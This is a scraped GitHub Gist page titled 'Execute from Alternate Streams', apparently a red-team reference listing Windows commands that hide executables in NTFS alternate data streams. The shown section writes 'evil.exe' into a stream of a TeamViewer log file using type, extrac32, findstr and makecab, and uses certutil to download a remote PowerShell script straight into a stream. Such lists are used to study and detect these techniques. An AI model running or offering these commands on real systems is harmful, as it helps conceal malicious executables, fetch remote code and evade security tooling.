Skip to content

Instantly share code, notes, and snippets.

View R-udren's full-sized avatar
🎯
Focusing

Robert R-udren

🎯
Focusing
  • Latvia
View GitHub Profile
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active October 19, 2024 21:39
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab